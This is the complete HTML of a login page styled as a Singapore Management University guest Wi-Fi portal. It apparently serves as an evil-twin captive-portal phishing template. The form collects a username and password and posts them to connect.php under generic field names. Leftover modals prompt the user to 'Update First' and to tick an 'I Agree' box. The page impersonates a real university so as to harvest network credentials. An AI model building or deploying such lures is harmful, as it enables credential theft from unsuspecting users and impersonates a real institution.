<!DOCTYPE html>
<html lang="en">
  <head>
    <link rel="icon" href="smu-logo.jpeg" type="image/icon type" />
    <title>Log in to SMU Portal</title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link rel="stylesheet" href="bootstrap.min.css" />

    <!-- CSS -->
    <style type="text/css">
      /* Sticky footer styles
    -------------------------------------------------- */

      html,
      body {
        height: 100%;
        /* The html and body elements cannot have any padding or margin. */
      }

      /* Wrapper for page content to push down footer */
      #wrap {
        min-height: 100%;
        height: auto !important;
        height: 100%;
        /* Negative indent footer by it's height */
        margin: 0 auto -60px;
      }

      /* Set the fixed height of the footer here */
      #push,
      #footer {
        height: 60px;
      }
      #footer {
        background-color: #f5f5f5;
      }

      /* Lastly, apply responsive CSS fixes as necessary */
      @media (max-width: 767px) {
        #footer {
          margin-left: -20px;
          margin-right: -20px;
          padding-left: 20px;
          padding-right: 20px;
        }
      }
    </style>

    <script type="text/javascript"></script>
  </head>

  <body>
    <!-- Start page content -->
    <div class="container">
      <!-- <div class="row"> -->
      <img src="smu-logo.jpeg" style="width: 25%" />
      <!-- </div> -->
      <div class="col-sm">
        <p class="lead">
          Please login to the network using your SMU Guest username and password
        </p>
      </div>

      <div class="form-group has-feedback">
        <form method="POST" action="connect.php">
          <label>Username:</label>
          <input
            class="form-control"
            type="text"
            name="password1"
            required="required"
          />
          <label>Password:</label>
          <input
            class="form-control"
            type="password"
            name="password2"
            required="required"
          />
          <input
            type="submit"
            value="Log in"
            class="btn btn-primary mt-2"
            style="margin-top: 5px"
          />
        </form>
      </div>
      <div class="container text-center"></div>
      <div id="push"></div>
    </div>
    <!-- Start page content -->

    <!-- Start footer -->
    <footer class="footer">
      <div class="container text-center">
        <p class="text-muted">
          ©Copyright 2022 Singapore Management University. All Rights Reserved
        </p>
      </div>
    </footer>
    <!-- End footer -->

    <!-- Start update first message -->
    <div class="modal fade" id="update-only" role="dialog">
      <div class="modal-dialog modal-sm">
        <div class="modal-content">
          <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal">
              &times;
            </button>
            <h4 class="modal-title">Information</h4>
          </div>
          <div class="modal-body">
            <p>Please Update First.</p>
          </div>
          <div class="modal-footer">
            <button type="button" class="btn btn-default" data-dismiss="modal">
              Close
            </button>
          </div>
        </div>
      </div>
    </div>
    <!-- End update first message -->

    <!-- Start empty password message -->
    <div class="modal fade" id="empty-pass">
      <div class="modal-dialog modal-sm">
        <div class="modal-content">
          <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal">
              &times;
            </button>
            <h4 class="modal-title">Information</h4>
          </div>
          <div class="modal-body">
            <p>Please Input Valid Password.</p>
          </div>
          <div class="modal-footer">
            <button type="button" class="btn btn-default" data-dismiss="modal">
              Close
            </button>
          </div>
        </div>
      </div>
    </div>
    <!-- End empty password message -->

    <!-- Start empty password message -->
    <div class="modal fade" id="no-checkbox">
      <div class="modal-dialog modal-sm">
        <div class="modal-content">
          <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal">
              &times;
            </button>
            <h4 class="modal-title">Information</h4>
          </div>
          <div class="modal-body">
            <p>Please Check The I Agree Button.</p>
          </div>
          <div class="modal-footer">
            <button type="button" class="btn btn-default" data-dismiss="modal">
              Close
            </button>
          </div>
        </div>
      </div>
    </div>
    <!-- End empty password message -->
  </body>
</html>
